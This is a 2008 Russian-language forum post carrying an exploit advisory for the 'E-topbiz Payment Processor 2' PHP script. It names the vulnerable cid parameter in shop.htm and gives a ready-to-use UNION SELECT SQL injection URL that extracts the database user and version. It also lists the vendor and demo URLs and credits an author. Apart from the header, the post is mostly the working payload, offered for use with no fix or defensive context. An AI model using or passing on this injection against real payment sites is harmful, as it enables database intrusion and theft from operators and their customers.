02.08.2008, 15:39
|
|
Познающий
Регистрация: 01.08.2008
Сообщений: 42
С нами:
9355682
Репутация:
50
|
|
================================================== ==============================
|| E-topbiz Payment Processor 2 SQL-INJECTION
================================================== ==============================
Application: E-topbiz Payment Processor 2
------------
Version: 2.0
--------
Website: http://e-topbiz.com/oprema/pages/pproc2.php
--------
Demo: http://e-topbiz.com/trafficdemos/payment2/
-----
About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.
Date: 01-08-2008
-----
[ SQL-INJECTION ]
http://host/shop.htm?cid=-1[SQL]
===>>> Exploit:
http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())
Author: Corwin
-------
Contact: corwin88[dog]mail[dot]ru
--------
|
|
|